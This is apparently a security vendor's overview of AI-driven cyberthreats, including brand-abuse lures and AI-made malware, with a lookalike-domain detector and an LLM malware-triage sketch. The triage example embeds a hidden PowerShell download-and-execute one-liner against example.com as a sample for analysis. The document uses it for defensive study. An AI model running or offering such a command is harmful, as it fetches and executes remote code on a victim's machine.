Insights Into the AI-Based Cyberthreat Landscape
Large language models (LLMs) and generative AI are rapidly advancing in both capability and global adoption. While these tools offer undeniable utility to the general public, they also present potential for misuse, and bad actors are actively investigating tools like OpenAI's ChatGPT.
This document describes the following aspects of the AI-based cyberthreat landscape:
- How the ChatGPT brand is misused for lures, scams, and other social engineering threats
- How generative AI can be used to generate malware
- The potential pitfalls and changes generative AI brings for security researchers and attackers
- How ChatGPT and generative AI can help security researchers in their daily work, providing insights and bringing AI-based assistants to their toolset
Generative AI and other forms of AI are going to play a key role in the cyberthreat landscape. We expect highly believable, multilingual texts to be misused for phishing and scams at scale, giving attackers better opportunities for more advanced social engineering.
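Because fluent, AI-generated lures remove the classic grammar-mistake tell, detection shifts toward other signals, such as lookalike domains impersonating the ChatGPT brand. The sketch below is a minimal illustration, not a production detector: it uses Python's standard difflib to score how closely a hostname's first label resembles a watched brand name. The TARGET_BRANDS watchlist, the ALLOWLIST, and the 0.8 threshold are assumptions chosen for the example.

```python
import difflib
from urllib.parse import urlparse

# Illustrative watchlist: brands commonly impersonated in AI-themed lures.
TARGET_BRANDS = ["chatgpt", "openai"]

# Known-legitimate domains to exclude (assumed for this example).
ALLOWLIST = {"chatgpt.com", "openai.com"}

def lookalike_score(host: str, brand: str) -> float:
    """Return a 0..1 similarity between the host's first label and a brand."""
    # Compare only the first label, with hyphens stripped,
    # e.g. "chatgptapp" from "chat-gpt-app.example".
    label = host.lower().split(".")[0].replace("-", "")
    return difflib.SequenceMatcher(None, label, brand).ratio()

def flag_lookalikes(url: str, threshold: float = 0.8) -> list[str]:
    """Flag watched brands that the URL's host closely resembles."""
    host = urlparse(url).hostname or ""
    if host in ALLOWLIST:
        return []
    flags = []
    for brand in TARGET_BRANDS:
        score = lookalike_score(host, brand)
        if score >= threshold:
            flags.append(f"{brand} (similarity {score:.2f})")
    return flags

if __name__ == "__main__":
    for url in ("https://chat-gpt-app.example/login", "https://chatgpt.com"):
        print(url, "->", flag_lookalikes(url) or "no flags")
```

A real detector would combine this with many other signals, such as domain age, reputation, and certificate data; the point here is only how little code the similarity heuristic itself takes.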
On the other hand, we believe that generative AI as it stands now is unlikely to drastically alter the landscape of malware generation. Although proofs of concept exist, mainly from security firms and nefarious actors testing the technology, it remains a complex approach, especially when compared to existing, simpler methods.
Despite the risks, it is important to recognize the value that generative AI brings to the table when used for legitimate purposes. We already see security tools and AI-based assistants with varying levels of maturity and specialization emerging on the market.
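As one concrete illustration of such an assistant, the sketch below asks an LLM for a first-pass explanation of a suspicious command line. It is a minimal example assuming the official openai Python package (v1+) with an OPENAI_API_KEY set in the environment; the model name, prompt, and sample snippet are illustrative assumptions, not any specific product's implementation.

```python
# Minimal sketch of an AI-based triage assistant; assumes the official
# "openai" Python package (v1+) and an OPENAI_API_KEY environment variable.
from openai import OpenAI

client = OpenAI()  # picks up OPENAI_API_KEY from the environment

# Illustrative sample: a classic PowerShell download-and-execute one-liner.
SUSPICIOUS_SNIPPET = (
    "powershell -nop -w hidden -c "
    "\"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.com/a.ps1')\""
)

def triage(snippet: str) -> str:
    """Ask the model for a first-pass explanation and risk rating of a sample."""
    response = client.chat.completions.create(
        model="gpt-4o-mini",  # assumed model name; any capable model works
        messages=[
            {
                "role": "system",
                "content": (
                    "You are a malware-triage assistant. Explain what the given "
                    "command likely does and rate its risk as low/medium/high."
                ),
            },
            {"role": "user", "content": snippet},
        ],
    )
    return response.choices[0].message.content

if __name__ == "__main__":
    print(triage(SUSPICIOUS_SNIPPET))
```

In practice, such assistants are most useful as a first filter: the design keeps a human analyst in the loop rather than acting on the model's verdict automatically.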
Given the rapid development of these tools and the widespread availability of open-source versions, we can reasonably anticipate a substantial improvement in their capabilities in the near future.